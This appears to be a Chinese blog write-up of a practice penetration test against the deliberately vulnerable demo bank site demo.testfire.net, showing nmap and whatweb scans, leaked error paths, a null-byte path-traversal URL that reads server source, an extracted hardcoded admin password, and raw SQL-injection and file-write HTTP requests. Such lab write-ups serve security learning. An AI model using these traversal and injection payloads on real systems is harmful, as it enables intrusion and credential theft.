demo.testfire.net

span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; }.CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; }.cm-searching {background: #ffa; background: rgba(255, 255, 0, .4);}.cm-force-border { padding-right: .1px; }@media print { .CodeMirror div.CodeMirror-cursors {visibility: hidden;}}.cm-tab-wrap-hack:after { content: ""; }span.CodeMirror-selectedtext { background: none; }.CodeMirror-activeline-background, .CodeMirror-selected {transition: visibility 0ms 100ms;}.CodeMirror-blur .CodeMirror-activeline-background, .CodeMirror-blur .CodeMirror-selected {visibility:hidden;}.CodeMirror-blur .CodeMirror-matchingbracket {color:inherit !important;outline:none !important;text-decoration:none !important;}.CodeMirror-sizer {min-height:auto !important;}
-->
li {list-style-type:decimal;}.wiz-editor-body ol.wiz-list-level2 > li {list-style-type:lower-latin;}.wiz-editor-body ol.wiz-list-level3 > li {list-style-type:lower-roman;}.wiz-editor-body blockquote {padding: 0 12px;}.wiz-editor-body blockquote > :first-child {margin-top:0;}.wiz-editor-body blockquote > :last-child {margin-bottom:0;}.wiz-editor-body img {border:0;max-width:100%;height:auto !important;margin:2px 0;}.wiz-editor-body table {border-collapse:collapse;border:1px solid #bbbbbb;}.wiz-editor-body td,.wiz-editor-body th {padding:4px 8px;border-collapse:collapse;border:1px solid #bbbbbb;min-height:28px;word-break:break-word;box-sizing: border-box;}.wiz-hide {display:none !important;}
-->

信息搜集

域名

IP 端口信息

65.61.137.117

 
 
 
1
 
 
 
 
 
1
65.61.137.117
2














 


 








 


nmap 信息


root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT

Nmap scan report for 65.61.137.117

Host is up (0.60s latency).

Not shown: 995 closed ports

PORT     STATE    SERVICE      VERSION

80/tcp   open     http         Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

443/tcp  open     ssl/http     Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

| ssl-cert: Subject: commonName=demo.testfire.net

| Not valid before: 2014-07-01T09:54:37

|_Not valid after:  2019-12-22T09:54:37

|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.

445/tcp  filtered microsoft-ds

514/tcp  filtered shell

4444/tcp filtered krb524

Device type: general purpose

Running: Microsoft Windows XP|7|2012

OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012

OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Network Distance: 2 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:

|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s


TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   5.10 ms  192.168.245.2

2   26.32 ms 65.61.137.117


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117








2




Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT








3




Nmap scan report for 65.61.137.117








4




Host is up (0.60s latency).








5




Not shown: 995 closed ports








6




PORT     STATE    SERVICE      VERSION








7




80/tcp   open     http         Microsoft IIS httpd 8.0








8




| http-cookie-flags: 








9




|   /: 








10




|     amSessionId: 








11




|_      httponly flag not set








12




| http-methods: 








13




|_  Potentially risky methods: TRACE








14




|_http-server-header: Microsoft-IIS/8.0








15




|_http-title: Altoro Mutual








16




443/tcp  open     ssl/http     Microsoft IIS httpd 8.0








17




| http-cookie-flags: 








18




|   /: 








19




|     amSessionId: 








20




|_      httponly flag not set








21




| http-methods: 








22




|_  Potentially risky methods: TRACE








23




|_http-server-header: Microsoft-IIS/8.0








24




|_http-title: Altoro Mutual








25




| ssl-cert: Subject: commonName=demo.testfire.net








26




| Not valid before: 2014-07-01T09:54:37








27




|_Not valid after:  2019-12-22T09:54:37








28




|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.








29




445/tcp  filtered microsoft-ds








30




514/tcp  filtered shell








31




4444/tcp filtered krb524








32




Device type: general purpose








33




Running: Microsoft Windows XP|7|2012








34




OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012








35




OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012








36




Network Distance: 2 hops








37




Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows








38












39




Host script results:








40




|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s








41












42




TRACEROUTE (using port 1723/tcp)








43




HOP RTT      ADDRESS








44




1   5.10 ms  192.168.245.2








45




2   26.32 ms 65.61.137.117








46












47




OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .








48




Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds








49


















 


 








中间件


root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/

http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/








2




http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]














 


 








总结




  • windows 服务器 , asp.net (aspx) . iis8
    • 

  • 靶机网站, 域名, cdn 等信息无需搜集




 


漏洞挖掘


错误日志,泄露物理路径


GET 请求访问 http://demo.testfire.net/comment.aspx






 


 


 












 


 


 




 








 


 




1




An Error Has Occurred








2




Summary:








3




Value cannot be null.








4












5




Error Message:








6




System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


疑似程序路径


c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31




 


 


 














x




 


 




 








 


 




1




c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31














 


 








 


登录处无验证码 ( maybe 暴力破解)






 


 


 














x




 


 




 








 


 




1




http://www.altoromutual.com/bank/login.aspx














 


 








 


任意文件内容读取


 


查看 login.aspx 的源代码






 


 


 














x




 


 




 








 


 




1




http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt














 


 








给出不存在的文件会报出目录信息


Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.

            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)

            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)

            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)

            at System.IO.StreamReader..ctor(String path)

            at System.IO.File.OpenText(String path)

            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42

            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70

            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)

            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)

            at System.Web.UI.Control.OnLoad(EventArgs e)

            at System.Web.UI.Control.LoadRecursive()

            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)




 


 


 












 


 


 




 








 


 




1




Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








2




        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.








3




            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








4




            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)








5




            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)








6




            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)








7




            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)








8




            at System.IO.StreamReader..ctor(String path)








9




            at System.IO.File.OpenText(String path)








10




            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42








11




            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70








12




            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)








13




            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)








14




            at System.Web.UI.Control.OnLoad(EventArgs e)








15




            at System.Web.UI.Control.LoadRecursive()








16




            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


读取 /admin/login.aspx 的源码 拿到 管理员的密码


if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")




 


 


 














x




 


 




 








 


 




1




if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234") 














 


 








SQL 注入


POST /bank/login.aspx HTTP/1.1

Host: demo.testfire.net

Content-Length: 45

Cache-Control: max-age=0

Origin: http://demo.testfire.net

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://demo.testfire.net/bank/login.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288

Connection: close


uid=hac425%27&passw=%27%27%27&btnSubmit=Login




 


 


 












 


 


 




 








 


 




1




POST /bank/login.aspx HTTP/1.1








2




Host: demo.testfire.net








3




Content-Length: 45








4




Cache-Control: max-age=0








5




Origin: http://demo.testfire.net








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://demo.testfire.net/bank/login.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288








14




Connection: close








15












16




uid=hac425%27&passw=%27%27%27&btnSubmit=Login














 


 








 


写文件


貌似只能写 txt , 写 aspx 访问不了


POST /comment.aspx HTTP/1.1

Host: www.altoromutual.com

Content-Length: 111

Cache-Control: max-age=0

Origin: http://www.altoromutual.com

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://www.altoromutual.com/feedback.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004

Connection: close


cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+




 


 


 














x




 


 




 








 


 




1




POST /comment.aspx HTTP/1.1








2




Host: www.altoromutual.com








3




Content-Length: 111








4




Cache-Control: max-age=0








5




Origin: http://www.altoromutual.com








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://www.altoromutual.com/feedback.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004








14




Connection: close








15












16




cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+














 


 








 


 


 


 


 


 


 


 


 
												


											
demo.testfire.net 靶场测试流程记录的更多相关文章
	

    
								
  1. 利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库)
		
    利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库),完成预期的任务,大致有下面几步: 1.代码提交到github平台 2.创建.podspec 3. ...
    
		
    2. 
						
  2. 互联网App应用程序测试流程及测试总结
		
    互联网App应用程序测试流程及测试总结 1. APP测试基本流程 1.1流程图 仍然为测试环境 Pass 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日 ...
    
		
    3. 
						
  3. web测试流程的总结及关注点
		
    项目的测试流程大只包含的几个阶段:立项.需求评审.用例评审.测试执行.测试报告文档 一.立项后测试需要拿到的文档 1.需求说明书 2.原型图(及UI图) 3.接口文档 4.数据库字典(表的数量.缓存机 ...
    
		
    4. 
						
  4. 抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程
		
    转自:http://www.51testing.com/html/80/n-3726980.html   抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程 发表于:2018-6-06 11: ...
    
		
    5. 
						
  5. web手工项目01-系统组织框架-测试流程-需求评审-测试计划与方案
		
    回顾 SVN(定义,作用,使用操作) 软件缺陷(定义,表现形式,原因和根源,基本内容,跟踪流程) JIRA(基本介绍,使用者,工作流,问题,使用) 学习目标 掌握WAMP的环境搭建 掌握熟悉项目的步骤 ...
    
		
    6. 
						
  6. APP测试流程梳理
		
    APP测试流程梳理 1 APP测试基本流程 1.1流程图 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日),根据项目情况以及版本质量可适当缩短或延长测试 ...
    
		
    7. 
						
  7. 【转载】基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)——介绍、安装准备、安装、config文件以及运行脚本介绍
		
    基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)--介绍.安装准备.安装.config文件以及运行脚本介绍 其他 2018-0 ...
    
		
    8. 
						
  8. ltp 测试流程及测试脚本分析
		
    LTP介绍 (2011-03-25 18:03:53) 转载▼ 标签: ltp linux 压力测试 杂谈 分类: linux测试 LTP介绍 一.LTP介绍1.简介LTP(Linux Test Pr ...
    
		
    9. 
						
  9. 【腾讯优测干货分享】如何降低App的待机内存(二)——规范测试流程及常见问题
		
    本文来自于腾讯优测公众号(wxutest),未经作者同意,请勿转载,原文地址:https://mp.weixin.qq.com/s/806TiugiSJvFI7fH6eVA5w 作者:腾讯TMQ专项测 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. HTML 遍历
			
    HTML 遍历 HTML基本格式: 1.下行遍历: 属性 说明 contents 子节点的列表,将所有儿子节点存入列表 children 子节点的迭代类型,与.contents类似,用于循环遍历儿子节 ...
    
			
    2. 
						
  2. Swift 使用 #warning
			
    swift 中没法使用#Warning来提示警告, 可以通过给TODO: FIXME:加上警告, 实现类似的效果. Build Phases ---> Run Script ---> ad ...
    
			
    3. 
						
  3. 54.Storm环境搭建
			
    集群环境搭建 关闭防火墙,修改/etc/hosts配置(3台机器的ip可以相互通信) 下载安装jdk7(1.6以上),配置JAVA_HOME, CLASSPATH 搭建Zookeeper集群(保证3台 ...
    
			
    4. 
						
  4. java基本语法一
			
    1 关键字和保留字 1.1 关键字 关键字的定义:被java语言赋予了特殊含义,用做专门用途的字符串(单词). 关键字的特点:关键字中的所有字母都是小写. 1.2 保留字 java保留字:现有Java ...
    
			
    5. 
						
  5. GDAL VS2010 win7(64位)安装、使用说明(图文解析)
			
    一.电脑配置及安装版本 Win 7(64位机) Visual Studio 2010 GDAL 1.9.2(我也尝试了最新版GDAL1.11.0,应该同样可以用的,只是在重新配置时又选用了老一点的版本 ...
    
			
    6. 
						
  6. python中使用eval() 和 ast.literal_eval()的区别                                                       分类:            Python             2015-05-11 15:21    1216人阅读    评论(0)    收藏
			
    eval函数在python中做数据类型的转换还是很有用的.它的作用就是把数据还原成它本身或者是能够转化成的数据类型. 那么eval和ast.literal_val()的区别是什么呢? eval在做计算 ...
    
			
    7. 
						
  7. mysql时间字符串按年/月/天/时分组查询  -- date_format
			
    SELECT DATE_FORMAT( deteline, "%Y-%m-%d %H" ) , COUNT( * ) FROM test GROUP BY DATE_FORMAT( ...
    
			
    8. 
						
  8. px、pt和em的区别
			
    (转载)http://www.1z1b.com/one-blog-a-week/px-em-pt/ 这里引用的是Jorux的“95%的中国网站需要重写CSS”的文章,题目有点吓人,但是确实是现在国内网 ...
    
			
    9. 
						
  9. Oracle数据库中的分页--rownum
			
    1. 介绍 当我们在做查询时,经常会遇到如查询限定行数或分页查询的需求,MySQL中可以使用LIMIT子句完成,在MSSQL中可以使用TOP子句完成,那么在Oracle中,我们如何实现呢? Oracl ...
    
			
    10. 
						
  10. Java序列化机制和原理
			
    Java序列化算法透析 Serialization(序列化)是一种将对象以一连串的字节描述的过程:反序列化deserialization是一种将这些字节重建成一个对象的过程.Java序列化API提供一 ...
    
			
    11.